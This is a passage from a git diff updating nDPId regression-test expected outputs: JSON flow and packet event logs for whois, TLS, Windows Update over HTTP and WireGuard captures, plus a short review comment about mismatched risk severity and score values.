{"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} 
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":1806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1623517268690} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} 02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\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"} 02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\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"} 
-00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":23,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":4920,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1623517269021} 
@@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881946 bytes -~~ total memory freed........: 5881946 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6010064 bytes +~~ total memory freed........: 6010064 bytes +~~ total allocations/frees...: 120914/120914 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 2069 chars diff --git a/test/results/windowsupdate_over_http.pcap.out b/test/results/windowsupdate_over_http.pcap.out new file mode 100644 index 000000000..7be0fb513 --- /dev/null +++ b/test/results/windowsupdate_over_http.pcap.out 
@@ -0,0 +1,24 @@ +00474{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":94209,"flow_last_seen":94209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":94209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":94209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94209,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0zkVAAIAGQI8KAAIPl2NIfcKXAFAVLcI9AAAAAIAC+vDt3QAAAgQFtAEDAwgBAQQC"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":94216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":94216,"pkt":"CAAn5uVZUlQAEjUCCABFAAAs7dwAAEAGoQCXY0h9CgACDwBQwpcBAsoBFS3CPmAS\/\/9G0AAAAgQFtA=="} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":94216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":94216,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozkxAAIAGQJQKAAIPl2NIfcKXAFAVLcI+AQLKAlAQ+vBjnAAA"} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":94209,"flow_last_seen":94216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":94216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"},"http": {"hostname":"151.99.72.125","url":"151.99.72.125\/data\/0783dedfb62fa709\/msedge.b.tlu.dl.delivery.mp.microsoft.com\/filestreamingservice\/files\/d1d060c0-7ece-4b96-9558-4bd0f2326040?P1=1652084683&P2=404&P3=2&P4=GtXnDMvssaTVZE%2bliGRNZPdTCGZcdK3lsfQhBycGI5on2dyQK7mRzg%2fAP%2fOuVTebtfWU%2bfL%2bVpkQ9bwhNwUDPA%3d%3d","code":0,"content_type":"","user_agent":"Microsoft-Delivery-Optimization\/10.0"}} 
+01314{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":94209,"flow_last_seen":94225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1919,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":94225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"Download"},"http": {"hostname":"151.99.72.125","url":"151.99.72.125\/data\/0783dedfb62fa709\/msedge.b.tlu.dl.delivery.mp.microsoft.com\/filestreamingservice\/files\/d1d060c0-7ece-4b96-9558-4bd0f2326040?P1=1652084683&P2=404&P3=2&P4=GtXnDMvssaTVZE%2bliGRNZPdTCGZcdK3lsfQhBycGI5on2dyQK7mRzg%2fAP%2fOuVTebtfWU%2bfL%2bVpkQ9bwhNwUDPA%3d%3d","code":206,"content_type":"application\/octet-stream","user_agent":"Microsoft-Delivery-Optimization\/10.0"}} +00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":94209,"flow_last_seen":94227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":14879,"flow_avg_l4_payload_len":743,"midstream":0,"thread_ts_msec":94227,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"Download"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":14879,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":94227} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 20/20 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 14879 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6004046 bytes +~~ total memory freed........: 6004046 bytes +~~ total allocations/frees...: 120901/120901 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 453 chars +~~ json string max len.......: 1319 chars +~~ json string avg len.......: 857 chars diff --git a/test/results/wireguard.pcap.out b/test/results/wireguard.pcap.out index 2e5a6ca43..455087dff 100644 --- a/test/results/wireguard.pcap.out +++ b/test/results/wireguard.pcap.out 
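Review bot: In the new windowsupdate_over_http expected output, the `severity` labels and the `risk_score` values under `flow_risk` do not line up. Risk 12 ("HTTP Numeric IP Address") is labelled `Low` with `total` 500, while risk 4 ("Binary App Transfer") is labelled `Severe` with `total` 250. This file is presumably what the test run is compared against, so it would pin that pairing; it is worth confirming against libnDPI's risk table that label and score come from the same entry before committing it. The same flow also reports `category` as `SoftwareUpdate` in the `detected` event and `Download` in `detection-update` and `idle`, so consumers that alert on category should use the latest event for a `flow_id`.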
@@ -4,10 +4,10 @@ 01528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAAM8FXkAADURYEKLosCdwKgADspsjRQDKLH1BAAAAL5AaY1rAAAAAAAAANUJ2VrXQI01RZfJr8PEwgZEhNNcu6x03VWSZ67dhAHHTWKcRpBFkk8NVHd\/C4D4pz\/puWqoUUxKuxxH6YlcxuxAvZFB0Na5O4CW6jEyMIx3UMKSHboRTInUKfs0ifRWz\/ah3LYVezBxxWAse8HA4hp9J+12MZT8TmyygIwyCCaeEvoUQjFc6leSZrAZpKnPNseLUtXq9seSkA+QHufBd5P\/nAxkid4Fwq057VLJqJcJvFJRIdSNrsUBNHlMd2O226LQDMo6+sXnZNRhM\/0lY6T99lZ2rtutA5g+LROCm\/BZLu+Ww0aOhZ9T5CPKvl1MXzbqDpHjEWohQohUG62HCabsLz2Pl6HJpafmxv\/xXmUvqTxvWO5iYVSI4YH0rzZVN3aVdPUxgXYG+W8rSU+st0bg\/OnAMZWFzotivj2mfqRsGMWV3egRFwhvlfe7Fuv0OvGM3s9ZvinFAlmQZqUDOt74G5zoedU\/69v6LWqjWqMgwmKLQ\/lMwt2MnS6hiTwk\/iqPpTIM8RYnxG13RvjKDr4JXT\/U7OnZL63BA8kKbkL5zeTL+gL4bvPs8T4bLqWJpX+KPgKK5qcCbrRIXtRaFjvffCmBHmxiams\/n7B6m2DssFWcjX1Ev1oBu1UMKN6t2aeneW6ZYl4Q+afpKmmTZbh75sYoA8rPXxM4Q6E\/CvQ8xKFJuG12US4vfj96Tg+HLqjTKQn0aT3tP\/WRrjoWHz5nOKAwY2ssdZ\/sOQ7Z4I975oMYqMkolPHC\/IQyZ00spefKrUv00QdKXcsmU90gzx2i\/XncJUiW6+cRr5y\/xIasdRDvxOeWrnEuyr4eneiO5Pi37MXP8f2E65R6K8EWKkhOt2QxypTL9OYJAB3d80dQUxikTgyJwcF9uQEqgJNA\/GZhO2rBxL\/P3ze0It5qd4umjz9rSz1Tj4x9V7iRrPWik7ncKTUF\/OLBOu3ao3EyUG8u2N+GMLh6DNMnc3AMj260R63yyZIj87BZpn+95duhzSfs8I4u6YbCy54JPpusEK7oluD\/Hy2\/DI77VPA2QYc="} 
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAACsFXoAADURYtGLosCdwKgADspsjRQAmIUlBAAAAL5AaY1sAAAAAAAAAApaAsrtXpH1hJEWMIaMon2Jp07DYKtFnos9KJ2dxNXsnPOlMw8teGIqqtQyAhfCvZKfSoj8FKmPC1PCtu8qqniK567s\/wF6cALr5IJXHXdFnmr1I94kKjzDU62XCT24xGedWrUZRek84+e2Fsx1lJJ6NR9cFgw9VnO9J77GX8hL"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1563973554628,"pkt":"ABAY3q0FOCxKuzMdCABFAAB8LYcAAEARP\/TAqAAOi6LAnY0UymwAaNyeBAAAAG2mYV5wAAAAAAAAAAo35XrmOHswcilnP2QelKUcrUyMt+9zQAFDeYSUJyyw9BNkc7uq5jhjxm51P1MBuT08PEWRrzriFSk+BrqayZkHU3Oi+bUZJb76bMmarQhF"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} 
-00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1563973742644,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} -00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973930443,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1563973742644,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973930443,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} 
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","packets-captured":2399,"packets-processed":2399,"total-skipped-flows":0,"total-l4-payload-len":633424,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1563973935842} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2399/2399 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5939014 bytes -~~ total memory freed........: 5939014 bytes -~~ total allocations/frees...: 120513/120513 +~~ total memory allocated....: 6072648 bytes +~~ total memory freed........: 6072648 bytes +~~ total allocations/frees...: 123275/123275 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 1533 chars diff --git a/test/results/wow.pcap.out b/test/results/wow.pcap.out index a6ce3fe24..9f294d35f 100644 --- a/test/results/wow.pcap.out +++ b/test/results/wow.pcap.out 
